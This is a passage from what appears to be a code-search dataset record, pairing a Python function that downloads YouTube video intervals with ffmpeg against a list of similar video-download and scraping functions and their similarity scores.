print_title=0):\n try:\n p = pafy.new(url)\n\n except (IOError, ValueError) as e:\n g.message = c.r + str(e) + c.w\n g.content = g.content or generate_songlist_display(zeromsg=g.message)\n return\n\n g.browse_mode = \"normal\"\n v = Video(p.videoid, p.title, p.length)\n g.model.songs = [v]\n\n if not g.command_line:\n g.content = generate_songlist_display()\n\n if print_title:\n xprint(v.title)", "def displayVideoStill(request, flightName=None, time=None, thumbnail=False, isDownload=0):\n noImagePath = \"%s/xgds_video/images/NoImage.png\" % settings.STATIC_ROOT\n noImageThumbnailPath = \"%s/xgds_video/images/NoImage.thumbnail.png\" % \\\n settings.STATIC_ROOT\n\n if not settings.XGDS_VIDEO_STILLS_ENABLED:\n if thumbnail:\n return buildImageResponse(noImageThumbnailPath, noImageThumbnailPath)\n else:\n return buildImageResponse(noImagePath, noImagePath)\n\n try:\n requestedTime = datetime.datetime.strptime(time, \"%Y-%m-%d_%H-%M-%S\")\n except:\n try:\n requestedTime = datetime.datetime.strptime(time, \"%Y-%m-%d %H-%M-%S+00:00\")\n except:\n requestedTime = datetime.datetime.strptime(time, \"%Y-%m-%d %H:%M:%S+00:00\")\n\n thumbnailPath = \"%s/%s_%s.thumbnail.jpg\" % (settings.IMAGE_CAPTURE_DIR, flightName, time)\n fullSizePath = \"%s/%s_%s.jpg\" % (settings.IMAGE_CAPTURE_DIR, flightName, time)\n\n # We generate full image and thumbnail together, so one check for \n # existence should be OK. If we don't find it, we generate one and cache it\n if not os.path.isfile(fullSizePath):\n captureStillImage(flightName, requestedTime)\n\n # The image should now be there, but just in case, we catch exceptions\n if thumbnail:\n thePath = thumbnailPath\n default = noImageThumbnailPath\n else:\n thePath = fullSizePath\n default = noImagePath\n response = buildImageResponse(thePath, default)\n if isDownload:\n response['Content-disposition'] = 'attachment; filename=%s' % os.path.basename(fullSizePath)\n return response", "def download_url(url, destination_filename=None, progress_updater=None, \n force_download=False, verbose=True):\n \n if progress_updater is not None and isinstance(progress_updater,bool):\n if not progress_updater:\n progress_updater = None\n else:\n progress_updater = DownloadProgressBar()\n \n url_no_sas = url.split('?')[0]\n \n if destination_filename is None:\n target_folder = get_temp_folder()\n url_without_sas = url.split('?', 1)[0]\n \n # This does not guarantee uniqueness, hence \"semi-best-effort\"\n url_as_filename = re.sub(r'\\W+', '', url_without_sas)\n n_folder_chars = len(ai4e_utils_temp_dir)\n if len(url_as_filename) + n_folder_chars > max_path_len:\n print('Warning: truncating filename target to {} characters'.format(max_path_len))\n url_as_filename = url_as_filename[-1*(max_path_len-n_folder_chars):]\n destination_filename = \\\n os.path.join(target_folder,url_as_filename)\n \n if (not force_download) and (os.path.isfile(destination_filename)):\n if verbose:\n print('Bypassing download of already-downloaded file {}'.format(os.path.basename(url_no_sas)))\n else:\n if verbose:\n print('Downloading file {} to {}'.format(os.path.basename(url_no_sas),destination_filename),end='')\n urllib.request.urlretrieve(url, destination_filename, progress_updater) \n assert(os.path.isfile(destination_filename))\n nBytes = os.path.getsize(destination_filename)\n if verbose:\n print('...done, {} bytes.'.format(nBytes))\n \n return destination_filename", "def downloadSong(self, song, outputFolder=\"\", outputFunction=None, writeJSON=True):\n\n \"\"\"\n -x: Extract audio\n --audio-format: sets the audio format from ogg to mp3\n --audio-quality: 0 is best\n --write-info-json: Writes the DASH information for the downloaded video to the filename with .info.json appended\n \"\"\"\n audioOptions = self.audioOptions.copy() # Generate a shallow copy of our object's options\n if writeJSON:\n audioOptions[\"--write-info-json\"] = True\n audioOptions.update(settings[\"youtubeSettings\"])\n\n self.youtubeLock.acquire() # Wait the requisite amount of time\n log.debug(\"Downloading Song '{}'\".format(song))\n obj = subprocess.Popen(\n [settings[\"youtube_dl\"]] + # Executable\n self.flattenDict(audioOptions) + #Turn the dict items into a list where key is before value. Bools are special. If false, not added, otherwise only key\n [\"-o\", os.path.join(outputFolder, settings[\"formatString\"])] + #Output format and folder\n [\"--\", song], #Then add song as input\n **settings[\"pipeOptions\"], #Add in subprocess options\n stdout=subprocess.PIPE #Also this for now\n )\n \n outputText = \"\"\n for line in obj.stdout:\n outputText += line\n match = re.match(r\"\\[download\\]\\s+([\\d.]+)% of \\S+ at\\s+([\\d.]+\\S+)\", line) #Matches the download update lines\n if match:\n percent, downloadRate = match.group(1, 2)\n if callable(outputFunction):\n outputFunction(song, float(percent), downloadRate) #Update this if we have items\n return obj.wait(), outputText # Wait for process to complete and get return code. Also return the whole output printed to stdout", "def soup_process_video(input_url):\r\n # scrape the url\r\n fp = urllib.request.urlopen(input_url)\r\n #read bytes\r\n mybytes = fp.read()\r\n mystr = mybytes.decode(\"utf8\")\r\n fp.close()\r\n soup = BeautifulSoup(mystr,'html.parser')\r\n return (soup.find(\"a\", {'class': \"download-btn\"}).get('href'))", "def download1():\n #t=request.vars.arg(0)\n response.flash=request\n #print request.wsgi.environ['HTTP_REFERER']\n #print 'yghklo=',request.args[0]\n a=db(db.Project.Project_File==request.args[0]).select(db.Project.ALL)\n #a=db(db.Project.id==38).select(db.Project.ALL)\n #if a == None:\n#\t print 'silent'\n # print 'a= aabhas download',a[0].no_of_download, a[0].Project_File\n # if a[0].no_of_download==None:\n#\t a[0].no_download=0\n db(db.Project.Project_File==a[0].Project_File).update(no_of_download=(a[0].no_of_download or 0)+1)\n print 'a.id=',a[0].id\n # print len(a),'\\n'\n #print \"\\n\\n\\n\\n\"\n return response.download(request, db)", "def add_videos(playlist):\n surl = playlist['link']\n # 작은 playlist의 url을 surl에 저장\n soup = get_soup(surl)\n # 작은 플레이리스트의 html 파싱하여 soup에 저장\n print(f\" getting videos for playlist: {playlist['title']}\")\n\n videos = []\n\n # items are list of video a links from list\n items = soup('a', class_='yt-uix-tile-link')\n # a 태그의 class가 'yt-uix-tile-link'인 태그 items에 저장\n # items는 작은 플레이리스트의 동영상 목록들임\n\n # note first part of look get info from playlist page item,\n # and the the last part opens the video and gets more details\n if len(items) > 0:\n for i in items:\n # 각각의 items i에 하나씩 저장\n d = dict()\n vurl = fix_url(i['href'])\n # 동영상 url을 vurl에 저장\n t = i.find_next('span', {'aria-label': True})\n # 동영상의 span 태그 중 aria=label값이 존재하는 것 t에 저장\n # t는 동영상의 재생 시간임\n d['time'] = t.text if t else 'NA'\n # d 딕셔너리에 t저장\n\n d.update(parse_video(vurl))\n videos.append(d)\n # videos에 d를 append\n\n else: # must be only one video\n d = {'time': 'NA'}\n d.update(parse_video(surl))\n videos.append(d)\n\n # add new key to this playlist of list of video infos\n playlist['videos'] = videos\n print()", "def download(self):\n\n # os.open *should* give a thread-safe way to exlusivly open files\n filepath = self.film\n try:\n # os.O_BINARY is only avilable and needed on windows\n flags = os.O_CREAT | os.O_EXCL | os.O_WRONLY | os.O_BINARY\n except:\n flags = os.O_CREAT | os.O_EXCL | os.O_WRONLY\n try:\n fd = os.open(filepath, flags)\n except:\n return\n\n try:\n response = self.session.get(self.filmurl, stream=True)\n if response.status_code == 200:\n for chunk in response.iter_content(1024):\n os.write(fd, chunk)\n except:\n # Remove partial img file if request or stream fails\n os.close(fd)\n os.remove(filepath)", "def fetch_youtube_url(search_term, dev_key=None):\r\n in_cache, video_id = check_if_in_cache(search_term)\r\n if in_cache:\r\n return YOUTUBE_VIDEO_URL + video_id\r\n if not dev_key:\r\n YOUTUBE_SEARCH_BASE = \"https://www.youtube.com/results?search_query=\"\r\n try:\r\n response = requests.get(YOUTUBE_SEARCH_BASE + search_term).content\r\n html_response = html.fromstring(response)\r\n video = html_response.xpath(\"//a[contains(@class, 'yt-uix-tile-link')]/@href\")\r\n video_id = re.search(\"((\\?v=)[a-zA-Z0-9_-]{4,15})\", video[0]).group(0)[3:]\r\n log.debug(f\"Found video id {video_id} for search term {search_term}\")\r\n _ = save_to_cache(search_term=search_term, video_id=video_id)\r\n return YOUTUBE_VIDEO_URL + video_id\r\n except AttributeError as e:\r\n log.warning(f\"Could not find scrape details for {search_term}\")\r\n capture_exception(e)\r\n return None\r\n except IndexError as e:\r\n log.warning(f\"Could not perform scrape search for {search_term}, got a different HTML\")\r\n capture_exception(e)\r\n return None\r\n else:\r\n youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,\r\n developerKey=dev_key,\r\n cache_discovery=False)\r\n try:\r\n in_cache, video_id = check_if_in_cache(search_term)\r\n\r\n if not in_cache:\r\n search_response = youtube.search().list(q=search_term,\r\n part='id, snippet').execute()\r\n for v in search_response['items']:\r\n if v['id']['kind'] == VIDEO:\r\n video_id = v['id']['videoId']\r\n log.debug(f\"Adding Video id {video_id}\")\r\n _ = save_to_cache(search_term=search_term, video_id=video_id) \r\n return YOUTUBE_VIDEO_URL + video_id\r\n except HttpError as err:\r\n err_details = loads(err.content.decode('utf-8')).get('error').get('errors')\r\n secho(\"Couldn't complete search due to following errors: \", fg='red')\r\n for e in err_details:\r\n error_reason = e.get('reason')\r\n error_domain = e.get('domain')\r\n error_message = e.get('message')\r\n\r\n if error_reason == 'quotaExceeded' or error_reason == 'dailyLimitExceeded':\r\n secho(f\"\\tYou're over daily allowed quota. Unfortunately, YouTube restricts API keys to a max of 10,000 requests per day which translates to a maximum of 100 searches.\", fg='red')\r\n secho(f\"\\tThe quota will be reset at midnight Pacific Time (PT).\" ,fg='red')\r\n secho(f\"\\tYou can request for Quota increase from https://console.developers.google.com/apis/api/youtube.googleapis.com/quotas.\", fg='red')\r\n else:\r\n secho(f\"\\t Search failed due to {error_domain}:{error_reason}, message: {error_message}\")\r\n return None", "def test_techtv_video_download(logged_in_client, is_public, mocker):\n mock_redirect = mocker.patch(\n \"ui.views.redirect\", return_value=HttpResponseRedirect(redirect_to=\"/\")\n )\n client, _ = logged_in_client\n client.logout()\n ttv_video = TechTVVideoFactory(video=VideoFactory(is_public=is_public))\n VideoFileFactory(video=ttv_video.video, encoding=EncodingNames.ORIGINAL)\n url = reverse(\"techtv-download\", kwargs={\"video_key\": ttv_video.ttv_id})\n result = client.get(url)\n if is_public:\n mock_redirect.assert_called_with(ttv_video.video.download.cloudfront_url)\n else:\n assert result.status_code == status.HTTP_404_NOT_FOUND", "def request_id(self):\n select_id = input(\"\\n>>> \")\n select_dict = [format for format in self.result['formats']\n if format['format_id'] == select_id][0]\n filesize = size(select_dict['filesize']\n ) if select_dict['filesize'] else 0\n # url = select_dict['url']\n print(f\"Downloading {self.result['title']}, size={filesize}\")\n self.title = self.result['title']\n for item in [\"(\", \")\", \" \", \",\", \".\", \"'\"]:\n self.title = self.title.replace(item, '_')\n self.title = self.title.replace('__', '_')\n self.download_video(select_id)", "def start(self):\n if not path.exists(self.dir):\n mkdir(self.dir)\n\n try:\n yt = YouTube(self.link)\n ys = yt.streams\n if self.aud == True:\n ysf = ys.get_audio_only()\n elif self.aud == False:\n ysf = ys.get_by_resolution(resolution=self.res)\n ysf.download(self.dir)\n except AttributeError:\n raise Exception(f\"Resolution [{self.res}] is not available for this video\")\n except excep.RegexMatchError:\n raise Exception(\"Invalid link!\")\n except excep.VideoPrivate:\n raise Exception(\"This video is private! Try with a public one\")\n except excep.PytubeError:\n raise Exception(\"Error occured!\")\n except excep.VideoPrivate:\n raise Exception(\"This video is private! Try with a public one\")\n except excep.VideoUnavailable:\n raise Exception(\"This video is unvailable!\")\n except excep.ExtractError:\n raise Exception(\"Error in extractiong the video!\")\n except Exception:\n raise Exception(\"Error occured. Make sure of your connection ;)\")", "async def youtube(self, ctx, *args):\n if not args:\n await ctx.send(\"usage: `>youtube [search string]`\")\n return\n search_string = \" \".join(args)\n search_string = urllib.parse.urlencode({'search_query': search_string})\n response = requests.get('http://www.youtube.com/results?' + search_string + \"&hl=en_US&app=desktop\")\n if response.status_code == 200:\n search_results = re.findall('href=\\\\\"\\\\/watch\\\\?v=(.{11})', response.content.decode())\n try:\n first_result_url = 'http://www.youtube.com/watch?v=' + search_results[0]\n except IndexError:\n with open('downloads/yt_dump.txt', 'w') as f:\n f.write(response.content.decode())\n #print(response.is_redirect)\n return await ctx.send(\"Found nothing!\")\n await ctx.send(first_result_url)\n self.logger.info(misolog.format_log(ctx, f\"{first_result_url}\"))\n else:\n await ctx.send(\"Error: status code \" + str(response.status_code))\n self.logger.info(misolog.format_log(ctx, f\"error{response.status_code}\"))", "def makeVideo():\n weekNumber = 11\n for _ in range(10):\n df = loadDbIntoDf2('trending')\n df_copy = df.copy()\n df_shorter = selectTop(df_copy,'week',weekNumber , 'trending')\n vid_dl = download(df_shorter,weekNumber)\n merge(vid_dl,weekNumber)\n weekNumber = weekNumber + 1" ]
[ "0.73994005", "0.72689897", "0.7202489", "0.7171504", "0.7060031", "0.6903402", "0.6774965", "0.67710614", "0.67318517", "0.6675659", "0.66156524", "0.66117424", "0.6610987", "0.6610455", "0.6599049", "0.6573128", "0.6570862", "0.6523697", "0.651439", "0.65080476", "0.6456765", "0.6438936", "0.6420223", "0.63628674", "0.6347987", "0.6316836", "0.630469", "0.6295695", "0.6261652", "0.62441987", "0.6240782", "0.62377167", "0.62249035", "0.6218854", "0.61887825", "0.61823463", "0.61735266", "0.6156181", "0.6138414", "0.6074583", "0.60702664", "0.6029479", "0.6005604", "0.599143", "0.5897943", "0.5862752", "0.5839226", "0.5836839", "0.58254516", "0.5782076", "0.57784367", "0.5762937", "0.5751648", "0.57486576", "0.5719397", "0.5713739", "0.5708756", "0.5698091", "0.56788266", "0.5666224", "0.5666109", "0.5632567", "0.5629973", "0.5629735", "0.56011426", "0.5582667", "0.5572083", "0.55652946", "0.55567676", "0.5551311", "0.5549839", "0.55467635", "0.5517811", "0.54941064", "0.54890627", "0.5487537", "0.54616624", "0.5461089", "0.5457112", "0.5396878", "0.5374856", "0.53690976", "0.536876", "0.5367878", "0.5360986", "0.5359349", "0.53581905", "0.53479016", "0.53402615", "0.53366196", "0.53266114", "0.5325372", "0.5306229", "0.5305461", "0.53030086", "0.53020245", "0.529894", "0.529894", "0.5298093", "0.5297567" ]
0.74180853
0
Function to download videos in specified intervals Takes a list (interval_list) and a path as inputs
def download_interval(interval_list): start = ['start', 'begin', 'beginning', 'head', 'first'] end = ['slut', 'end', 'tail', 'finish', 'finito', 'fin', 'done', 'finished'] # Iterate over the list for link in range(len(interval_list)): try: video = pafy.new(interval_list[link][0], ydl_opts={ 'nocheckcertificate': True, "noplaylist": True}) # Only downloads the video if the video hasn't been downloaded before if not os.path.exists(os.path.join("tmp", f"{video.title}.mp4")): video_s = video.getbestvideo() # TODO: add a way to get the second best stream (third etc.) when an error occurs using Pafy.videostreams and going through the list video_a = video.getbestaudio() # Checks if the end point is a string if interval_list[link][1][1].lower() in end: # Where is the stream, where should we start, how long should it run mp4_vid = ffmpeg.input( video_s.url, ss=interval_list[link][1][0], t=video.duration) mp4_aud = ffmpeg.input( video_a.url, ss=interval_list[link][1][0], t=video.duration) else: # Where is the stream, where should we start, how long should it run mp4_vid = ffmpeg.input( video_s.url, ss=interval_list[link][1][0], t=interval_list[link][1][1]) mp4_aud = ffmpeg.input( video_a.url, ss=interval_list[link][1][0], t=interval_list[link][1][1]) # Do the processing try: ( ffmpeg .concat( # Specify what you want from the streams (v for video and a for audio) mp4_vid['v'], mp4_aud['a'], # One video stream and one audio stream v=1, a=1 ) # Output is title of video with mp4 ending .output(os.path.join("tmp", f'{video.title}.mp4')) .run() ) except TypeError as e: print(f"An error occurred e 0: {e}") except ffmpeg._run.Error as e: print(f"An error occurred e 1: {e}") except Exception as e: print(f"I couldn't download {interval_list[link]} due to: {e}")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def download_whole(no_interval):\n print(os.getcwd())\n SAVE_PATH = 'tmp'\n ydl_opts = {\"nocheckcertificate\": True, \"noplaylist\": True,\n 'outtmpl': f'{SAVE_PATH}/%(title)s.%(ext)s'}\n\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n for video in range(len(no_interval)):\n try:\n ydl.download([no_interval[video]])\n except youtube_dl.utils.ExtractorError or youtube_dl.utils.DownloadError:\n print(f\"Couldn't download {no_interval[video]}\")\n continue", "def download_videos(blink, save_dir=\"/media\"):\n blink.download_videos(save_dir, since=get_date())", "def download_cdn_videos(filenames,sub_urls,handout_urls,video_urls, target_dir):\n \"\"\" using a simple file downloader \"\"\"\n for i, v in enumerate(video_urls):\n filename_prefix = str(i+1).zfill(2) + '-'\n #original_filename = v.rsplit('/', 1)[1]\n video_filename = filename_prefix + filenames[i] + '.mp4'\n sub_filename = filename_prefix + filenames[i] + '.srt'\n handout_filename = filename_prefix + filenames[i] + '.srt'\n video_path = os.path.join(target_dir, video_filename)\n sub_path = os.path.join(target_dir, sub_filename)\n handout_path = os.path.join(target_dir, handout_filename)\n #print('[debug] GET %s' % v)\n print('[download] Destination: %s' % video_path)\n v = quote(v,safe=\":/\")\n if len(v) != YOUTUBE_VIDEO_ID_LENGTH:\n req = Request(v) \n try:\n video = urlopen(v)\n fileSize = int(video.headers['content-length'])\n finish = False\n existSize = 0\n if os.path.exists(video_path):\n output = open(video_path,\"ab\")\n existSize = os.path.getsize(video_path)\n #If the file exists, then only download the remainder\n if existSize < fileSize:\n #print(\"[debug] bytes range is: %s-%s\" % (existSize,fileSize))\n req.headers[\"Range\"]= \"bytes=%s-%s\" % (existSize,fileSize)\n video = urlopen(req)\n else:\n finish = True\n else:\n output = open(video_path,\"wb\")\n if finish == False:\n file_size_dl = existSize\n block_sz = 262144\n while True:\n buffer = video.read(block_sz)\n if not buffer:\n break\n \n file_size_dl += len(buffer)\n output.write(buffer)\n status = r\"%10d [%3.2f%%]\" % (file_size_dl, file_size_dl * 100. / fileSize)\n status = status + chr(8)*(len(status)+1)\n sys.stdout.write(status)\n sys.stdout.flush()\n \n output.close()\n\n except URLError as e:\n print(\"[warning]error: %r when downloading %s\" % (e.reason,v) )\n\n else:\n download_youtube_video(v,video_path)\n \n if sub_urls[i] != \"\":\n #print('[debug] GET %s' % BASE_URL+sub_urls[i])\n if not os.path.exists(sub_path):\n subs_string = edx_get_subtitle(sub_urls[i], headers)\n if subs_string:\n print('[info] Writing edX subtitles: %s' % sub_path)\n open(os.path.join(os.getcwd(), sub_path),\n 'wb+').write(subs_string.encode('utf-8'))\n\n if handout_urls[i] != \"\":\n #print('[debug] GET %s' % BASE_URL+sub_urls[i])\n if not os.path.exists(handout_path):\n handout_content = urlopen(BASE_URL+handout_urls[i]).read()\n if handout_content:\n print('[info] Writing handout: %s' % handout_path)\n open(os.path.join(os.getcwd(), handout_path),\n 'wb+').write(handout_content)\n #srtfile = urlopen(BASE_URL+sub_urls[i])\n #output = open(srt_path,'wb')\n #output.write(srtfile.read())\n #output.close()", "def download(pattern):\n query = pattern.lower()\n videolist = getvideolist()\n filename = []\n for video in videolist:\n for value in video.values():\n if query in str(value).lower():\n filename.append(video[\"file\"])\n if filename:\n for name in filename:\n downloadvideo(name)\n else:\n safeprint(\"No video matching the given query was found.\")", "def download(df_shorter,folderName):\n os.mkdir(str(folderName))\n path = os.getcwd()+'\\\\'+str(folderName)+'\\\\'\n #add column with video link generated from IDs\n df_shorter['urls'] = df_shorter['id'].apply(lambda x: generateLinkFromId(x))\n vid_dl = []\n i = 1\n for url in df_shorter['urls']:\n if url != False:\n name = str(i)+'.mp4'\n vid_dl.append(wget.download(url,path+name))#retrun the path of the saved video\n i = i+1\n return vid_dl", "def download_videos(download_limit=6):\n videos = []\n for fname in os.listdir('yt_api_data'):\n videos += load_video_data(fname)\n vids_downloaded = 0\n excluded_vids = get_excluded_videos()\n for video_id, title in videos:\n if download_limit != 'all' and vids_downloaded == download_limit:\n break\n title = title.replace(' ', '_')\n mkv_path = \"videos/\" + title + \".mkv\"\n mp4_path = \"videos/\" + title + \".mp4\"\n download_fpath = \"videos/\" + title\n if not check_excluded_list(excluded_vids, title) and not os.path.isfile(mkv_path) and not os.path.isfile(mp4_path):\n print(colored(str(vids_downloaded + 1) + \": \", \"yellow\") + colored(video_id + \" downloading: \" + download_fpath, \"green\"))\n command_prefix = \"youtube-dl -o \" + download_fpath\n if video_id[0] == '-': \n os.system(command_prefix + \" -- \" + video_id)\n else:\n os.system(command_prefix + \" \" + video_id)\n vids_downloaded += 1\n else:\n print(colored(\"skipping download: \" + title + \"with youtube_id: \" + video_id, \"yellow\"))", "def _download_file(self, video_objects):\n downloaded_video = []\n path=\"media/\"\n for video_object in video_objects:\n if 'contentUrl' in video_object.keys() and video_object['contentUrl']!='':\n \n url = video_object['contentUrl']\n filename = url.split('/')[-1]\n r = requests.get(url, stream=True)\n \n with open(filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024): \n if chunk:\n f.write(chunk)\n\n path+=filename\n return path", "def do_downloads(filename1=\"og\", filename2=\"lyrical\", video_id=DEFALT_VIDEO_ID):\n original_video_url = youtube_id_to_url(video_id)\n download_from_url(original_video_url, filename1)\n lyrics_video_url = get_lyrics_url(original_video_url)\n download_from_url(lyrics_video_url, filename2)\n\n return filename1, filename2", "def download_videos(data, category):\n # file_ids = get_existing_file_ids()\n\n # Sorry: This is gross.\n directory = os.path.abspath('./' + slugify(category))\n if not os.path.exists(directory):\n os.mkdir(directory)\n\n print 'Saving files to {0}'.format(directory)\n\n start_time = time.time()\n failed_videos = []\n\n for line in data[category]:\n print ''\n print 'Working on {0} - {1}'.format(line[0], line[2])\n\n # if line[0] in file_ids:\n # print ' Skipping -- already got it'\n # continue\n\n fn = '{0}_{1}'.format(line[0], slugify(line[2]))\n try:\n download_video(line[3], os.path.join(directory, fn))\n except NoDownloadMeNoLikeyException:\n failed_videos.append(line)\n\n print ''\n if failed_videos:\n print 'FAILED VIDEOS:'\n for fail in failed_videos:\n print ' ' + '\\t'.join(fail)\n print ''\n\n print 'Total videos: {0}'.format(len(data[category]))\n print 'Total time: {0}'.format(format_duration(time.time() - start_time))\n return 0", "def download_videos(self, path, since=None, camera=\"all\", stop=10, debug=False):\n if since is None:\n since_epochs = self.last_refresh\n else:\n parsed_datetime = parse(since, fuzzy=True)\n since_epochs = parsed_datetime.timestamp()\n\n formatted_date = get_time(time_to_convert=since_epochs)\n _LOGGER.info(\"Retrieving videos since %s\", formatted_date)\n\n if not isinstance(camera, list):\n camera = [camera]\n\n for page in range(1, stop):\n response = api.request_videos(self, time=since_epochs, page=page)\n _LOGGER.debug(\"Processing page %s\", page)\n try:\n result = response[\"media\"]\n if not result:\n raise IndexError\n except (KeyError, IndexError):\n _LOGGER.info(\"No videos found on page %s. Exiting.\", page)\n break\n\n self._parse_downloaded_items(result, camera, path, debug)", "def multi_download(self, url_list):\n workers = 4\n with ThreadPoolExecutor(workers) as ex:\n urls = [url_list[x] for x in range(len(url_list))]\n self.filenames = [str(y)+\".txt\" for y in range(len(url_list))]\n ex.map(self.download, urls, self.filenames)\n return self.filenames", "def download_video(url, fn):\n start_time = time.time()\n\n # Sorry: This is terrible code, but I'm kind of throwing it\n # together as I discover more about it.\n print ' Downloading {0} to {1}'.format(url, fn)\n\n resp = requests.get(url)\n if resp.status_code != 200:\n print ' GAH! MY EYES! {0} kicked up {1}'.format(url, resp.status_code)\n return\n\n rss_url_m = re.search(r'\"(/rss/flash/\\d+)\"', resp.content)\n rss_url = 'http://blip.tv' + rss_url_m.group(0).strip('\"')\n resp = requests.get(rss_url)\n\n rss_content = resp.content\n\n for ending in POSSIBLE_ENDINGS:\n regex = r'\"http://blip.tv[^\"]+?' + ending + '\"'\n\n download_m = re.search(regex, rss_content)\n if not download_m:\n print ' No {0} url found'.format(ending)\n continue\n\n download_url = download_m.group(0).strip('\"')\n print ' Attempting to download {0}'.format(download_url)\n\n try:\n resp = requests.get(download_url, stream=True)\n print ' Downloading {0}'.format(download_url)\n if resp.status_code == 200:\n total_length = int(resp.headers['content-length'])\n\n if os.path.exists(fn + ending) and file_size(fn + ending) == total_length:\n print ' Already downloaded.'\n return\n\n with open(fn + ending, 'w') as fp:\n total_downloaded = 0\n\n tic_chunk = total_downloaded\n tic = time.time()\n for chunk in resp.iter_content(chunk_size=1024):\n if chunk:\n fp.write(chunk)\n fp.flush()\n tic_chunk += len(chunk)\n total_downloaded += len(chunk)\n\n if time.time() - tic > 1:\n with TERM.location(x=0):\n line = ' {0} {1}kbps'.format(\n format_downloaded(total_downloaded, total_length),\n int(tic_chunk / (time.time() - tic) / 1000))\n sys.stdout.write(line + TERM.clear_eol)\n sys.stdout.flush()\n tic_chunk = 0\n tic = time.time()\n print ''\n\n print ' Done! {0} {1}mb {2}'.format(\n fn + ending,\n int(total_length / 1000000.0),\n format_duration(time.time() - start_time))\n return\n\n else:\n print ' HTTP{0}! GAH! SPUTTER!'.format(resp.status_code)\n\n except requests.exceptions.ConnectionError as exc:\n print ' CONNECTIONERROR! GAH! SPUTTER! {0}'.format(exc)\n\n print ' SO MANY FAILURES!'\n raise NoDownloadMeNoLikeyException()", "def create_original_videos(frames, video_path, interval):\n ncols = int(math.sqrt(len(frames)))\n fig, ax = plt.subplots(\n ncols=ncols,\n nrows=ncols,\n figsize=(5 * ncols, 5 * ncols),\n tight_layout=True,\n )\n max_len = max([len(f) for f in frames])\n\n def init():\n ims = []\n k = 0\n for k in range(ncols):\n for j in range(ncols):\n ims.append(ax[j][k].imshow(unnorm(frames[k * ncols + j][0])))\n ax[j][k].grid(False)\n ax[j][k].set_xticks([])\n ax[j][k].set_yticks([])\n return ims\n\n ims = init()\n\n def update(i):\n print(\"{}/{}\".format(i, max_len))\n for k in range(ncols):\n for j in range(ncols):\n idx = (\n i\n if i < len(frames[k * ncols + j])\n else len(frames[k * ncols + j]) - 1\n )\n ims[k * ncols + j].set_data(unnorm(frames[k * ncols + j][idx]))\n plt.tight_layout()\n return ims\n\n anim = FuncAnimation(\n fig, update, frames=np.arange(max_len), interval=interval, blit=False,\n )\n anim.save(video_path, dpi=80)", "def browse_video_list(video_list: List[str], browser: webdriver.Firefox):\n if not video_list or len(video_list) == 0:\n log.warning(\"Empty video list or null list.\")\n log.debug(\"Video list to be watched: {}\".format(video_list))\n unknown_failure_counter: int = 0\n js_execution_failure_counter: int = 0\n success_count: int = 0\n total_video_length: int = len(video_list)\n log.info(\"Start watching list of videos, total size: {}\".format(total_video_length))\n for i, video in enumerate(video_list):\n current_success: bool = False\n retry_count: int = 0\n video: str = FireFoxSimpleAutoBrowsing.__trim_youtube_link(video)\n log.info(\"Index: {}, watching: {}\".format(i + 1, video))\n current_video_screenshot_dir: str = os.path.join(\n FireFoxSimpleAutoBrowsing.SCREENSHOT_PATH,\n video.replace('/', '-').replace(':', '-').replace('.', '-'))\n if not os.path.exists(current_video_screenshot_dir):\n os.makedirs(current_video_screenshot_dir)\n log.debug(\"\\tCreate dir {} for screenshot\".format(current_video_screenshot_dir))\n log.info(\"\\tScreenshot for video {} saved at {}.\"\n .format(video, current_video_screenshot_dir))\n while not current_success and retry_count < FireFoxSimpleAutoBrowsing.RETRY_CHANCES:\n try:\n refreshed: bool = False\n browser.get(video)\n if settings.fast:\n FireFoxSimpleAutoBrowsing.__play_at_fastest_speed(browser)\n current_status: str = FireFoxSimpleAutoBrowsing.__get_player_status(browser)\n video_time: float = FireFoxSimpleAutoBrowsing.__get_video_elapsed_time(browser)\n while current_status != \"ended\" and video_time < settings.watch_time:\n previous_video_time: float = video_time\n previous_status: str = current_status\n log.debug(\"\\tStatus: {}, video time: {:7.2f}s\"\n .format(current_status, video_time))\n time.sleep(FireFoxSimpleAutoBrowsing.STATUS_CHECK_INTERVAL)\n screenshot_file_name: str = \\\n os.path.join(current_video_screenshot_dir, str(time.ctime()) + \".png\")\n browser.save_screenshot(screenshot_file_name)\n video_time = FireFoxSimpleAutoBrowsing.__get_video_elapsed_time(browser)\n current_status = FireFoxSimpleAutoBrowsing.__get_player_status(browser)\n if abs(previous_video_time - video_time) < 10e-3 \\\n and previous_status == current_status \\\n and current_status in ['unstarted', 'paused', 'buffering']:\n if not refreshed:\n browser.refresh()\n log.warning(\"\\tVideo playing frozen. \"\n \"Try resolve by browser refreshed..\")\n refreshed = True\n else:\n raise YouTubePlayerException(\n \"\\tYouTube video play frozen, video stopped time: {}, \"\n \"current play status: {}.\".format(video_time, current_status),\n video)\n current_success = True\n success_count += 1\n except JavascriptException:\n js_execution_failure_counter += 1\n log.warning(\"JavascriptException during watching video {}, \"\n \"most like caused by unavailable video. \"\n \"Traceback is provided for analysis. Jump to next video (if any).\"\n .format(video), exc_info=True)\n break\n except InvalidSessionIdException as e:\n log.critical(\"Lost connection to Firefox browser, or Firefox browser crashed.\"\n \" Probably due to previous viewing too many videos. There is no \"\n \"point to continue current test. Quit the whole experiment.\")\n raise\n except Exception as e:\n retry_count += 1\n log.error(\"Exception during watching video {}, caused by: {},\"\n \" retry count: {}\".format(video, e, retry_count),\n exc_info=True)\n if retry_count >= FireFoxSimpleAutoBrowsing.RETRY_CHANCES:\n unknown_failure_counter += 1\n log.error(\"Video {} failed after retry {} times.\"\n .format(video, retry_count))\n log.info(\"Finished watching list, total {}, succeed count: {}, \"\n \"unknown failed count: {}, possible video unavailable count: {}\".\n format(total_video_length, success_count, unknown_failure_counter,\n js_execution_failure_counter))\n return", "def download_all_videos(self, dl_limit=10):\r\n counter = dl_limit\r\n self.video_link_title_keylist = self.video_link_title_dict.keys()\r\n music = []\r\n for title in self.video_link_title_keylist:\r\n try:\r\n title = title.encode('ascii')\r\n # print 'downloading title with counter: ', counter\r\n if not counter:\r\n return random.choice(music) #some margin for randomness, first result isnt always accurate, (gets slower...)\r\n print 'downloading title: ', title\r\n\r\n self.add_result(\"Dowloaded_Song\", title)\r\n\r\n path = self.download_video(self.video_link_title_dict[title], title)\r\n music.append(path)\r\n counter = counter - 1\r\n except:\r\n print \"illegal characters in youtube name\" + title + \"\\n trying next result\"", "def extract_frames_from_directory(count, source, destination):\n all_videos = os.listdir(source)\n 